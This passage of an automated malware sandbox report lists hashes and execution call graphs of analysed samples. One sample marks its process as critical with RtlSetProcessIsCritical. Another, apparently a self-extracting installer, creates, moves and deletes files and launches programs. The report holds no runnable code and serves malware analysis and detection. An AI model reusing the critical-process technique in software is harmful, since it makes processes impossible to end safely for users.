                                      • Opcode ID: c769cceeaab1c5788f2d2f38ed9cfea9b2d5d31623fac7323c8348fe1f3453e8
                                      • Instruction ID: 10112e42564e68340d640955571269014a520136d66d69748890423cbab3d178
                                      • Opcode Fuzzy Hash: c769cceeaab1c5788f2d2f38ed9cfea9b2d5d31623fac7323c8348fe1f3453e8
                                      • Instruction Fuzzy Hash: 5FE0C220A28A2547AB88F6589841EB9B3C2EBA4394B440028F80DD7286DD1CEE8187D2

                                      Execution Graph

                                      Execution Coverage:18.4%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 4282 7ff886ed2bd9 4283 7ff886ed2bff RtlSetProcessIsCritical 4282->4283 4285 7ff886ed2cb2 4283->4285

                                      Executed Functions

                                      Function 00007FF886ED2BD9 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 277 7ff886ed2bd9-7ff886ed2cb0 RtlSetProcessIsCritical 281 7ff886ed2cb2 277->281 282 7ff886ed2cb8-7ff886ed2ced 277->282 281->282
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.3776491132.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7ff886ed0000_javaclient.jbxd
                                      Similarity
                                      • API ID: CriticalProcess
                                      • String ID:
                                      • API String ID: 2695349919-0
                                      • Opcode ID: a52933192cbe1921031b6178dfb43a21d8ae2b8a9cc01b9aef1d15971f08df08
                                      • Instruction ID: 155f0e0dcd611f5e4915688e023810f5710749cd9cb5b0a965b5103da9b2e8f3
                                      • Opcode Fuzzy Hash: a52933192cbe1921031b6178dfb43a21d8ae2b8a9cc01b9aef1d15971f08df08
                                      • Instruction Fuzzy Hash: 7241E33180C6588FD719DF98D845BE9BBF0FF56311F14416ED08AD3592CB68A846CB91

                                      Execution Graph

                                      Execution Coverage:9.9%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:5.2%
                                      Total number of Nodes:1514
                                      Total number of Limit Nodes:36
                                      execution_graph 24924 f1ebf7 20 API calls 23040 f1e1f9 23041 f1e203 23040->23041 23044 f1df59 23041->23044 23072 f1dc67 23044->23072 23046 f1df73 23047 f1dfd0 23046->23047 23060 f1dff4 23046->23060 23048 f1ded7 DloadReleaseSectionWriteAccess 11 API calls 23047->23048 23049 f1dfdb RaiseException 23048->23049 23051 f1e1c9 23049->23051 23050 f1e0df 23059 f1e13d GetProcAddress 23050->23059 23065 f1e19b 23050->23065 23053 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23051->23053 23052 f1e06c LoadLibraryExA 23054 f1e0cd 23052->23054 23055 f1e07f GetLastError 23052->23055 23056 f1e1d8 23053->23056 23054->23050 23057 f1e0d8 FreeLibrary 23054->23057 23058 f1e0a8 23055->23058 23068 f1e092 23055->23068 23057->23050 23062 f1ded7 DloadReleaseSectionWriteAccess 11 API calls 23058->23062 23061 f1e14d GetLastError 23059->23061 23059->23065 23060->23050 23060->23052 23060->23054 23060->23065 23070 f1e160 23061->23070 23064 f1e0b3 RaiseException 23062->23064 23064->23051 23083 f1ded7 23065->23083 23066 f1ded7 DloadReleaseSectionWriteAccess 11 API calls 23067 f1e181 RaiseException 23066->23067 23069 f1dc67 ___delayLoadHelper2@8 11 API calls 23067->23069 23068->23054 23068->23058 23071 f1e198 23069->23071 23070->23065 23070->23066 23071->23065 23073 f1dc73 23072->23073 23074 f1dc99 23072->23074 23091 f1dd15 23073->23091 23074->23046 23077 f1dc94 23101 f1dc9a 23077->23101 23080 f1df24 23081 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23080->23081 23082 f1df55 23081->23082 23082->23046 23084 f1dee9 23083->23084 23085 f1df0b 23083->23085 23086 f1dd15 DloadLock 8 API calls 23084->23086 23085->23051 23087 f1deee 23086->23087 23088 f1df06 23087->23088 23089 f1de67 DloadProtectSection 3 API calls 23087->23089 23110 f1df0f 8 API calls 2 library calls 23088->23110 23089->23088 23092 f1dc9a DloadUnlock 3 API calls 23091->23092 23093 f1dd2a 23092->23093 23094 f1ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23093->23094 23095 f1dc78 23094->23095 23095->23077 23096 f1de67 23095->23096 23097 f1de7c DloadObtainSection 23096->23097 23098 f1de82 23097->23098 23099 f1deb7 VirtualProtect 23097->23099 23109 f1dd72 VirtualQuery GetSystemInfo 23097->23109 23098->23077 23099->23098 23102 f1dca7 23101->23102 23103 f1dcab 23101->23103 23102->23080 23104 f1dcb3 GetModuleHandleW 23103->23104 23105 f1dcaf 23103->23105 23106 f1dcc9 GetProcAddress 23104->23106 23108 f1dcc5 23104->23108 23105->23080 23107 f1dcd9 GetProcAddress 23106->23107 23106->23108 23107->23108 23108->23080 23109->23099 23110->23085 24874 f214f8 RaiseException 23115 f1aee0 23116 f1aeea __EH_prolog 23115->23116 23278 f0130b 23116->23278 23119 f1b5cb 23350 f1cd2e 23119->23350 23120 f1af2c 23122 f1afa2 23120->23122 23123 f1af39 23120->23123 23182 f1af18 23120->23182 23125 f1b041 GetDlgItemTextW 23122->23125 23130 f1afbc 23122->23130 23126 f1af75 23123->23126 23127 f1af3e 23123->23127 23125->23126 23131 f1b077 23125->23131 23138 f1af96 KiUserCallbackDispatcher 23126->23138 23126->23182 23137 f0ddd1 53 API calls 23127->23137 23127->23182 23128 f1b5f7 23132 f1b611 GetDlgItem SendMessageW 23128->23132 23133 f1b600 SendDlgItemMessageW 23128->23133 23129 f1b5e9 SendMessageW 23129->23128 23136 f0ddd1 53 API calls 23130->23136 23134 f1b08f GetDlgItem 23131->23134 23276 f1b080 23131->23276 23368 f19da4 GetCurrentDirectoryW 23132->23368 23133->23132 23140 f1b0c5 SetFocus 23134->23140 23141 f1b0a4 SendMessageW SendMessageW 23134->23141 23142 f1afde SetDlgItemTextW 23136->23142 23143 f1af58 23137->23143 23138->23182 23139 f1b641 GetDlgItem 23144 f1b664 SetWindowTextW 23139->23144 23145 f1b65e 23139->23145 23146 f1b0d5 23140->23146 23161 f1b0ed 23140->23161 23141->23140 23147 f1afec 23142->23147 23388 f01241 SHGetMalloc 23143->23388 23369 f1a2c7 GetClassNameW 23144->23369 23145->23144 23150 f0ddd1 53 API calls 23146->23150 23155 f1aff9 GetMessageW 23147->23155 23147->23182 23154 f1b0df 23150->23154 23151 f1af5f 23156 f1af63 SetDlgItemTextW 23151->23156 23151->23182 23152 f1b56b 23157 f0ddd1 53 API calls 23152->23157 23389 f1cb5a 23154->23389 23160 f1b010 IsDialogMessageW 23155->23160 23155->23182 23156->23182 23162 f1b57b SetDlgItemTextW 23157->23162 23160->23147 23165 f1b01f TranslateMessage DispatchMessageW 23160->23165 23166 f0ddd1 53 API calls 23161->23166 23163 f1b58f 23162->23163 23167 f0ddd1 53 API calls 23163->23167 23165->23147 23169 f1b124 23166->23169 23171 f1b5b8 23167->23171 23168 f1b6af 23175 f1b6df 23168->23175 23179 f0ddd1 53 API calls 23168->23179 23170 f0400a _swprintf 51 API calls 23169->23170 23176 f1b136 23170->23176 23177 f0ddd1 53 API calls 23171->23177 23172 f1b0e6 23288 f0a04f 23172->23288 23174 f1bdf5 98 API calls 23174->23168 23181 f1bdf5 98 API calls 23175->23181 23214 f1b797 23175->23214 23180 f1cb5a 16 API calls 23176->23180 23177->23182 23186 f1b6c2 SetDlgItemTextW 23179->23186 23180->23172 23188 f1b6fa 23181->23188 23183 f1b847 23189 f1b850 EnableWindow 23183->23189 23190 f1b859 23183->23190 23184 f1b174 GetLastError 23185 f1b17f 23184->23185 23294 f1a322 SetCurrentDirectoryW 23185->23294 23187 f0ddd1 53 API calls 23186->23187 23192 f1b6d6 SetDlgItemTextW 23187->23192 23196 f1b70c 23188->23196 23215 f1b731 23188->23215 23189->23190 23193 f1b876 23190->23193 23407 f012c8 GetDlgItem EnableWindow 23190->23407 23192->23175 23195 f1b89d 23193->23195 23204 f1b895 SendMessageW 23193->23204 23194 f1b195 23199 f1b1ac 23194->23199 23200 f1b19e GetLastError 23194->23200 23195->23182 23206 f0ddd1 53 API calls 23195->23206 23405 f19635 32 API calls 23196->23405 23197 f1b78a 23201 f1bdf5 98 API calls 23197->23201 23205 f1b227 23199->23205 23209 f1b237 23199->23209 23211 f1b1c4 GetTickCount 23199->23211 23200->23199 23201->23214 23203 f1b86c 23408 f012c8 GetDlgItem EnableWindow 23203->23408 23204->23195 23205->23209 23210 f1b46c 23205->23210 23213 f1b8b6 SetDlgItemTextW 23206->23213 23207 f1b725 23207->23215 23217 f1b407 23209->23217 23218 f1b24f GetModuleFileNameW 23209->23218 23310 f012e6 GetDlgItem ShowWindow 23210->23310 23219 f0400a _swprintf 51 API calls 23211->23219 23212 f1b825 23406 f19635 32 API calls 23212->23406 23213->23182 23214->23183 23214->23212 23221 f0ddd1 53 API calls 23214->23221 23215->23197 23222 f1bdf5 98 API calls 23215->23222 23217->23126 23230 f0ddd1 53 API calls 23217->23230 23399 f0eb3a 80 API calls 23218->23399 23225 f1b1dd 23219->23225 23221->23214 23227 f1b75f 23222->23227 23223 f1b47c 23311 f012e6 GetDlgItem ShowWindow 23223->23311 23295 f0971e 23225->23295 23226 f1b844 23226->23183 23227->23197 23231 f1b768 DialogBoxParamW 23227->23231 23229 f1b275 23233 f0400a _swprintf 51 API calls 23229->23233 23234 f1b41b 23230->23234 23231->23126 23231->23197 23232 f1b486 23235 f0ddd1 53 API calls 23232->23235 23236 f1b297 CreateFileMappingW 23233->23236 23237 f0400a _swprintf 51 API calls 23234->23237 23239 f1b490 SetDlgItemTextW 23235->23239 23240 f1b2f9 GetCommandLineW 23236->23240 23241 f1b376 __vswprintf_c_l 23236->23241 23242 f1b439 23237->23242 23312 f012e6 GetDlgItem ShowWindow 23239->23312 23246 f1b30a 23240->23246 23244 f1b381 ShellExecuteExW 23241->23244 23255 f0ddd1 53 API calls 23242->23255 23243 f1b203 23247 f1b215 23243->23247 23248 f1b20a GetLastError 23243->23248 23270 f1b39e 23244->23270 23400 f1ab2e SHGetMalloc 23246->23400 23303 f09653 23247->23303 23248->23247 23249 f1b4a2 SetDlgItemTextW GetDlgItem 23252 f1b4d7 23249->23252 23253 f1b4bf GetWindowLongW SetWindowLongW 23249->23253 23313 f1bdf5 23252->23313 23253->23252 23254 f1b326 23401 f1ab2e SHGetMalloc 23254->23401 23255->23126 23259 f1b332 23402 f1ab2e SHGetMalloc 23259->23402 23261 f1b3e1 23261->23217 23267 f1b3f7 UnmapViewOfFile CloseHandle 23261->23267 23262 f1bdf5 98 API calls 23264 f1b4f3 23262->23264 23263 f1b33e 23403 f0ecad 80 API calls ___scrt_fastfail 23263->23403 23338 f1d0f5 23264->23338 23267->23217 23269 f1b355 MapViewOfFile 23269->23241 23270->23261 23271 f1b3cd Sleep 23270->23271 23271->23261 23271->23270 23272 f1bdf5 98 API calls 23275 f1b519 23272->23275 23273 f1b542 23404 f012c8 GetDlgItem EnableWindow 23273->23404 23275->23273 23277 f1bdf5 98 API calls 23275->23277 23276->23126 23276->23152 23277->23273 23279 f01314 23278->23279 23280 f0136d 23278->23280 23281 f0137a 23279->23281 23409 f0da98 61 API calls 2 library calls 23279->23409 23410 f0da71 GetWindowLongW SetWindowLongW 23280->23410 23281->23119 23281->23120 23281->23182 23284 f01336 23284->23281 23285 f01349 GetDlgItem 23284->23285 23285->23281 23286 f01359 23285->23286 23286->23281 23287 f0135f SetWindowTextW 23286->23287 23287->23281 23291 f0a059 23288->23291 23289 f0a0ea 23290 f0a207 9 API calls 23289->23290 23292 f0a113 23289->23292 23290->23292 23291->23289 23291->23292 23411 f0a207 23291->23411 23292->23184 23292->23185 23294->23194 23296 f09728 23295->23296 23297 f09792 CreateFileW 23296->23297 23298 f09786 23296->23298 23297->23298 23299 f097e4 23298->23299 23300 f0b66c 2 API calls 23298->23300 23299->23243 23301 f097cb 23300->23301 23301->23299 23302 f097cf CreateFileW 23301->23302 23302->23299 23304 f09677 23303->23304 23305 f09688 23303->23305 23304->23305 23306 f09683 23304->23306 23307 f0968a 23304->23307 23305->23205 23458 f09817 23306->23458 23463 f096d0 23307->23463 23310->23223 23311->23232 23312->23249 23314 f1bdff __EH_prolog 23313->23314 23319 f1b4e5 23314->23319 23478 f1aa36 23314->23478 23317 f1aa36 ExpandEnvironmentStringsW 23324 f1be36 _wcsrchr 23317->23324 23318 f1c11d SetWindowTextW 23318->23324 23319->23262 23324->23317 23324->23318 23324->23319 23325 f1bf0b SetFileAttributesW 23324->23325 23330 f1c2e7 GetDlgItem SetWindowTextW SendMessageW 23324->23330 23333 f1c327 SendMessageW 23324->23333 23482 f117ac CompareStringW 23324->23482 23483 f19da4 GetCurrentDirectoryW 23324->23483 23485 f0a52a 7 API calls 23324->23485 23486 f0a4b3 FindClose 23324->23486 23487 f1ab9a 76 API calls new 23324->23487 23488 f235de 23324->23488 23327 f1bfc5 GetFileAttributesW 23325->23327 23337 f1bf25 ___scrt_fastfail 23325->23337 23327->23324 23329 f1bfd7 DeleteFileW 23327->23329 23329->23324 23331 f1bfe8 23329->23331 23330->23324 23332 f0400a _swprintf 51 API calls 23331->23332 23334 f1c008 GetFileAttributesW 23332->23334 23333->23324 23334->23331 23335 f1c01d MoveFileW 23334->23335 23335->23324 23336 f1c035 MoveFileExW 23335->23336 23336->23324 23337->23324 23337->23327 23484 f0b4f7 52 API calls 2 library calls 23337->23484 23339 f1d0ff __EH_prolog 23338->23339 23512 f0fead 23339->23512 23341 f1d130 23516 f05c59 23341->23516 23343 f1d14e 23520 f07c68 23343->23520 23347 f1d1a1 23537 f07cfb 23347->23537 23349 f1b504 23349->23272 23351 f1cd38 23350->23351 24010 f19d1a 23351->24010 23354 f1cd45 GetWindow 23355 f1b5d1 23354->23355 23360 f1cd65 23354->23360 23355->23128 23355->23129 23356 f1cd72 GetClassNameW 24015 f117ac CompareStringW 23356->24015 23358 f1cd96 GetWindowLongW 23359 f1cdfa GetWindow 23358->23359 23361 f1cda6 SendMessageW 23358->23361 23359->23355 23359->23360 23360->23355 23360->23356 23360->23358 23360->23359 23361->23359 23362 f1cdbc GetObjectW 23361->23362 24016 f19d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23362->24016 23364 f1cdd3 24017 f19d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23364->24017 24018 f19f5d 8 API calls ___scrt_fastfail 23364->24018 23367 f1cde4 SendMessageW DeleteObject 23367->23359 23368->23139 23370 f1a2e8 23369->23370 23371 f1a30d 23369->23371 24021 f117ac CompareStringW 23370->24021 23375 f1a7c3 23371->23375 23373 f1a2fb 23373->23371 23374 f1a2ff FindWindowExW 23373->23374 23374->23371 23376 f1a7cd __EH_prolog 23375->23376 23377 f01380 82 API calls 23376->23377 23378 f1a7ef 23377->23378 24022 f01f4f 23378->24022 23381 f1a809 23384 f01631 84 API calls 23381->23384 23382 f1a818 23383 f01951 126 API calls 23382->23383 23386 f1a83a __vswprintf_c_l new 23383->23386 23385 f1a814 23384->23385 23385->23168 23385->23174 23386->23385 23387 f01631 84 API calls 23386->23387 23387->23385 23388->23151 23390 f1ac74 5 API calls 23389->23390 23391 f1cb66 GetDlgItem 23390->23391 23392 f1cb88 23391->23392 23393 f1cbbc SendMessageW SendMessageW 23391->23393 23396 f1cb93 ShowWindow SendMessageW SendMessageW 23392->23396 23394 f1cc17 SendMessageW SendMessageW SendMessageW 23393->23394 23395 f1cbf8 23393->23395 23397 f1cc4a SendMessageW 23394->23397 23398 f1cc6d SendMessageW 23394->23398 23395->23394 23396->23393 23397->23398 23398->23172 23399->23229 23400->23254 23401->23259 23402->23263 23403->23269 23404->23276 23405->23207 23406->23226 23407->23203 23408->23193 23409->23284 23410->23281 23412 f0a214 23411->23412 23413 f0a238 23412->23413 23414 f0a22b CreateDirectoryW 23412->23414 23432 f0a180 23413->23432 23414->23413 23416 f0a26b 23414->23416 23421 f0a27a 23416->23421 23424 f0a444 23416->23424 23418 f0a27e GetLastError 23418->23421 23421->23291 23422 f0a254 23422->23418 23423 f0a258 CreateDirectoryW 23422->23423 23423->23416 23423->23418 23445 f1e360 23424->23445 23427 f0a494 23427->23421 23428 f0a467 23429 f0b66c 2 API calls 23428->23429 23430 f0a47b 23429->23430 23430->23427 23431 f0a47f SetFileAttributesW 23430->23431 23431->23427 23447 f0a194 23432->23447 23435 f0b66c 23436 f0b679 23435->23436 23444 f0b683 23436->23444 23455 f0b806 CharUpperW 23436->23455 23438 f0b692 23456 f0b832 CharUpperW 23438->23456 23440 f0b6a1 23441 f0b6a5 23440->23441 23442 f0b71c GetCurrentDirectoryW 23440->23442 23457 f0b806 CharUpperW 23441->23457 23442->23444 23444->23422 23446 f0a451 SetFileAttributesW 23445->23446 23446->23427 23446->23428 23448 f1e360 23447->23448 23449 f0a1a1 GetFileAttributesW 23448->23449 23450 f0a1b2 23449->23450 23451 f0a189 23449->23451 23452 f0b66c 2 API calls 23450->23452 23451->23418 23451->23435 23453 f0a1c6 23452->23453 23453->23451 23454 f0a1ca GetFileAttributesW 23453->23454 23454->23451 23455->23438 23456->23440 23457->23444 23459 f09820 23458->23459 23460 f09824 23458->23460 23459->23305 23460->23459 23469 f0a12d 23460->23469 23464 f096fa 23463->23464 23465 f096dc 23463->23465 23466 f09719 23464->23466 23477 f06e3e 74 API calls 23464->23477 23465->23464 23467 f096e8 FindCloseChangeNotification 23465->23467 23466->23305 23467->23464 23470 f1e360 23469->23470 23471 f0a13a DeleteFileW 23470->23471 23472 f0984c 23471->23472 23473 f0a14d 23471->23473 23472->23305 23474 f0b66c 2 API calls 23473->23474 23475 f0a161 23474->23475 23475->23472 23476 f0a165 DeleteFileW 23475->23476 23476->23472 23477->23466 23479 f1aa40 23478->23479 23480 f1aaf3 ExpandEnvironmentStringsW 23479->23480 23481 f1ab16 23479->23481 23480->23481 23481->23324 23482->23324 23483->23324 23484->23337 23485->23324 23486->23324 23487->23324 23489 f28606 23488->23489 23490 f28613 23489->23490 23491 f2861e 23489->23491 23501 f28518 23490->23501 23493 f28626 23491->23493 23500 f2862f __dosmaperr 23491->23500 23494 f284de _free 20 API calls 23493->23494 23497 f2861b 23494->23497 23495 f28634 23508 f2895a 20 API calls __dosmaperr 23495->23508 23496 f28659 HeapReAlloc 23496->23497 23496->23500 23497->23324 23500->23495 23500->23496 23509 f271ad 7 API calls 2 library calls 23500->23509 23502 f28556 23501->23502 23507 f28526 __dosmaperr 23501->23507 23511 f2895a 20 API calls __dosmaperr 23502->23511 23504 f28541 RtlAllocateHeap 23505 f28554 23504->23505 23504->23507 23505->23497 23507->23502 23507->23504 23510 f271ad 7 API calls 2 library calls 23507->23510 23508->23497 23509->23500 23510->23507 23511->23505 23513 f0feba 23512->23513 23541 f01789 23513->23541 23515 f0fed2 23515->23341 23517 f0fead 23516->23517 23518 f01789 76 API calls 23517->23518 23519 f0fed2 23518->23519 23519->23343 23521 f07c72 __EH_prolog 23520->23521 23558 f0c827 23521->23558 23523 f07c8d 23564 f1e24a 23523->23564 23525 f07cb7 23570 f1440b 23525->23570 23528 f07ddf 23529 f07de9 23528->23529 23530 f07e53 23529->23530 23602 f0a4c6 23529->23602 23534 f07ec4 23530->23534 23536 f0a4c6 8 API calls 23530->23536 23580 f0837f 23530->23580 23532 f07f06 23532->23347 23534->23532 23608 f06dc1 74 API calls 23534->23608 23536->23530 23538 f07d09 23537->23538 23540 f07d10 23537->23540 23539 f11acf 84 API calls 23538->23539 23539->23540 23542 f0179f 23541->23542 23553 f017fa __vswprintf_c_l 23541->23553 23543 f017c8 23542->23543 23554 f06e91 74 API calls __vswprintf_c_l 23542->23554 23544 f01827 23543->23544 23550 f017e7 new 23543->23550 23546 f235de 22 API calls 23544->23546 23548 f0182e 23546->23548 23547 f017be 23555 f06efd 75 API calls 23547->23555 23548->23553 23557 f06efd 75 API calls 23548->23557 23550->23553 23556 f06efd 75 API calls 23550->23556 23553->23515 23554->23547 23555->23543 23556->23553 23557->23553 23559 f0c831 __EH_prolog 23558->23559 23560 f1e24a new 8 API calls 23559->23560 23561 f0c874 23560->23561 23562 f1e24a new 8 API calls 23561->23562 23563 f0c898 23562->23563 23563->23523 23567 f1e24f new 23564->23567 23565 f1e27b 23565->23525 23567->23565 23576 f271ad 7 API calls 2 library calls 23567->23576 23577 f1ecce RaiseException Concurrency::cancel_current_task new 23567->23577 23578 f1ecb1 RaiseException Concurrency::cancel_current_task 23567->23578 23571 f14415 __EH_prolog 23570->23571 23572 f1e24a new 8 API calls 23571->23572 23573 f14431 23572->23573 23574 f07ce6 23573->23574 23579 f106ba 78 API calls 23573->23579 23574->23528 23576->23567 23579->23574 23581 f08389 __EH_prolog 23580->23581 23609 f01380 23581->23609 23583 f083a4 23617 f09ef7 23583->23617 23589 f083d3 23740 f01631 23589->23740 23590 f083cf 23590->23589 23598 f0a4c6 8 API calls 23590->23598 23601 f0846e 23590->23601 23744 f0bac4 CompareStringW 23590->23744 23594 f084ce 23643 f01f00 23594->23643 23597 f084d9 23597->23589 23647 f03aac 23597->23647 23657 f0857b 23597->23657 23598->23590 23636 f08517 23601->23636 23603 f0a4db 23602->23603 23607 f0a4df 23603->23607 23998 f0a5f4 23603->23998 23605 f0a4ef 23606 f0a4f4 FindClose 23605->23606 23605->23607 23606->23607 23607->23529 23608->23532 23610 f01385 __EH_prolog 23609->23610 23611 f0c827 8 API calls 23610->23611 23612 f013bd 23611->23612 23613 f1e24a new 8 API calls 23612->23613 23616 f01416 ___scrt_fastfail 23612->23616 23614 f01403 23613->23614 23614->23616 23745 f0b07d 23614->23745 23616->23583 23618 f09f0e 23617->23618 23619 f083ba 23618->23619 23761 f06f5d 76 API calls 23618->23761 23619->23589 23621 f019a6 23619->23621 23622 f019b0 __EH_prolog 23621->23622 23632 f01a00 23622->23632 23635 f019e5 23622->23635 23762 f0709d 23622->23762 23624 f01b50 23765 f06dc1 74 API calls 23624->23765 23626 f03aac 97 API calls 23630 f01bb3 23626->23630 23627 f01b60 23627->23626 23627->23635 23628 f01bff 23634 f01c32 23628->23634 23628->23635 23766 f06dc1 74 API calls 23628->23766 23630->23628 23631 f03aac 97 API calls 23630->23631 23631->23630 23632->23624 23632->23627 23632->23635 23633 f03aac 97 API calls 23633->23634 23634->23633 23634->23635 23635->23590 23637 f08524 23636->23637 23784 f10c26 GetSystemTime SystemTimeToFileTime 23637->23784 23639 f08488 23639->23594 23640 f11359 23639->23640 23786 f1d51a 23640->23786 23644 f01f05 __EH_prolog 23643->23644 23645 f01f39 23644->23645 23794 f01951 23644->23794 23645->23597 23648 f03ab8 23647->23648 23649 f03abc 23647->23649 23648->23597 23650 f03af7 23649->23650 23651 f03ae9 23649->23651 23929 f027e8 97 API calls 3 library calls 23650->23929 23655 f03b29 23651->23655 23928 f03281 85 API calls 3 library calls 23651->23928 23654 f03af5 23654->23655 23930 f0204e 74 API calls 23654->23930 23655->23597 23658 f08585 __EH_prolog 23657->23658 23659 f085be 23658->23659 23667 f085c2 23658->23667 23953 f184bd 99 API calls 23658->23953 23660 f085e7 23659->23660 23665 f0867a 23659->23665 23659->23667 23662 f08609 23660->23662 23660->23667 23954 f07b66 151 API calls 23660->23954 23662->23667 23955 f184bd 99 API calls 23662->23955 23665->23667 23931 f05e3a 23665->23931 23667->23597 23668 f08705 23668->23667 23937 f0826a 23668->23937 23671 f08875 23672 f0a4c6 8 API calls 23671->23672 23675 f088e0 23671->23675 23672->23675 23674 f0c991 80 API calls 23678 f0893b _memcmp 23674->23678 23941 f07d6c 23675->23941 23676 f08a70 23677 f08b43 23676->23677 23683 f08abf 23676->23683 23682 f08b9e 23677->23682 23692 f08b4e 23677->23692 23678->23667 23678->23674 23678->23676 23679 f08a69 23678->23679 23956 f08236 82 API calls 23678->23956 23957 f01f94 74 API calls 23678->23957 23958 f01f94 74 API calls 23679->23958 23691 f08b30 23682->23691 23961 f080ea 96 API calls 23682->23961 23685 f0a180 4 API calls 23683->23685 23683->23691 23684 f08b9c 23686 f09653 79 API calls 23684->23686 23689 f08af7 23685->23689 23686->23667 23688 f09653 79 API calls 23688->23667 23689->23691 23959 f09377 96 API calls 23689->23959 23690 f08c09 23703 f08c74 23690->23703 23739 f091c1 __except_handler4 23690->23739 23962 f09989 23690->23962 23691->23684 23691->23690 23692->23684 23960 f07f26 100 API calls __except_handler4 23692->23960 23693 f0aa88 8 API calls 23696 f08cc3 23693->23696 23699 f0aa88 8 API calls 23696->23699 23698 f08c4c 23698->23703 23966 f01f94 74 API calls 23698->23966 23717 f08cd9 23699->23717 23701 f08c62 23967 f07061 75 API calls 23701->23967 23703->23693 23704 f08d9c 23705 f08df7 23704->23705 23706 f08efd 23704->23706 23707 f08e69 23705->23707 23708 f08e07 23705->23708 23710 f08f23 23706->23710 23711 f08f0f 23706->23711 23727 f08e27 23706->23727 23709 f0826a CharUpperW 23707->23709 23713 f08e4d 23708->23713 23721 f08e15 23708->23721 23714 f08e84 23709->23714 23712 f12c42 75 API calls 23710->23712 23715 f092e6 121 API calls 23711->23715 23716 f08f3c 23712->23716 23713->23727 23970 f07907 108 API calls 23713->23970 23723 f08eb4 23714->23723 23724 f08ead 23714->23724 23714->23727 23715->23727 23973 f128f1 121 API calls 23716->23973 23717->23704 23968 f09b21 SetFilePointer GetLastError SetEndOfFile 23717->23968 23969 f01f94 74 API calls 23721->23969 23972 f09224 94 API calls __EH_prolog 23723->23972 23971 f07698 84 API calls __except_handler4 23724->23971 23733 f0904b 23727->23733 23974 f01f94 74 API calls 23727->23974 23729 f09156 23730 f0a444 4 API calls 23729->23730 23729->23739 23732 f091b1 23730->23732 23731 f09104 23948 f09d62 23731->23948 23732->23739 23975 f01f94 74 API calls 23732->23975 23733->23729 23733->23731 23733->23739 23947 f09ebf SetEndOfFile 23733->23947 23736 f0914b 23738 f096d0 75 API calls 23736->23738 23738->23729 23739->23688 23741 f01643 23740->23741 23990 f0c8ca 23741->23990 23744->23590 23746 f0b087 __EH_prolog 23745->23746 23751 f0ea80 80 API calls 23746->23751 23748 f0b099 23752 f0b195 23748->23752 23751->23748 23753 f0b1a7 ___scrt_fastfail 23752->23753 23756 f10948 23753->23756 23759 f10908 GetCurrentProcess GetProcessAffinityMask 23756->23759 23760 f0b10f 23759->23760 23760->23616 23761->23619 23767 f016d2 23762->23767 23764 f070b9 23764->23632 23765->23635 23766->23634 23768 f016e8 23767->23768 23779 f01740 __vswprintf_c_l 23767->23779 23769 f01711 23768->23769 23780 f06e91 74 API calls __vswprintf_c_l 23768->23780 23771 f01767 23769->23771 23776 f0172d new 23769->23776 23773 f235de 22 API calls 23771->23773 23772 f01707 23781 f06efd 75 API calls 23772->23781 23775 f0176e 23773->23775 23775->23779 23783 f06efd 75 API calls 23775->23783 23776->23779 23782 f06efd 75 API calls 23776->23782 23779->23764 23780->23772 23781->23769 23782->23779 23783->23779 23785 f10c56 __vsnwprintf_l 23784->23785 23785->23639 23787 f1d527 23786->23787 23788 f0ddd1 53 API calls 23787->23788 23789 f1d54a 23788->23789 23790 f0400a _swprintf 51 API calls 23789->23790 23791 f1d55c 23790->23791 23792 f1cb5a 16 API calls 23791->23792 23793 f11372 23792->23793 23793->23594 23795 f01961 23794->23795 23797 f0195d 23794->23797 23798 f01896 23795->23798 23797->23645 23799 f018a8 23798->23799 23800 f018e5 23798->23800 23801 f03aac 97 API calls 23799->23801 23806 f03f18 23800->23806 23804 f018c8 23801->23804 23804->23797 23810 f03f21 23806->23810 23807 f03aac 97 API calls 23807->23810 23808 f01906 23808->23804 23811 f01e00 23808->23811 23810->23807 23810->23808 23823 f1067c 23810->23823 23812 f01e0a __EH_prolog 23811->23812 23831 f03b3d 23812->23831 23814 f01e34 23815 f01ebb 23814->23815 23816 f016d2 76 API calls 23814->23816 23815->23804 23817 f01e4b 23816->23817 23859 f01849 76 API calls 23817->23859 23819 f01e63 23821 f01e6f 23819->23821 23860 f1137a MultiByteToWideChar 23819->23860 23861 f01849 76 API calls 23821->23861 23824 f10683 23823->23824 23825 f1069e 23824->23825 23829 f06e8c RaiseException Concurrency::cancel_current_task 23824->23829 23827 f106af SetThreadExecutionState 23825->23827 23830 f06e8c RaiseException Concurrency::cancel_current_task 23825->23830 23827->23810 23829->23825 23830->23827 23832 f03b47 __EH_prolog 23831->23832 23833 f03b79 23832->23833 23834 f03b5d 23832->23834 23836 f03dc2 23833->23836 23839 f03ba5 23833->23839 23890 f06dc1 74 API calls 23834->23890 23907 f06dc1 74 API calls 23836->23907 23838 f03b68 23838->23814 23839->23838 23862 f12c42 23839->23862 23841 f03c26 23843 f03cb1 23841->23843 23858 f03c1d 23841->23858 23893 f0c991 23841->23893 23842 f03c22 23842->23841 23892 f02034 76 API calls 23842->23892 23875 f0aa88 23843->23875 23845 f03c12 23891 f06dc1 74 API calls 23845->23891 23846 f03bf4 23846->23841 23846->23842 23846->23845 23848 f03cc4 23852 f03d48 23848->23852 23853 f03d3e 23848->23853 23899 f128f1 121 API calls 23852->23899 23879 f092e6 23853->23879 23856 f03d46 23856->23858 23900 f01f94 74 API calls 23856->23900 23901 f11acf 23858->23901 23859->23819 23860->23821 23861->23815 23863 f12c51 23862->23863 23865 f12c5b 23862->23865 23908 f06efd 75 API calls 23863->23908 23866 f12c9d Concurrency::cancel_current_task 23865->23866 23867 f12ca2 new 23865->23867 23874 f12cfd ___scrt_fastfail 23865->23874 23910 f2157a RaiseException 23866->23910 23868 f12da9 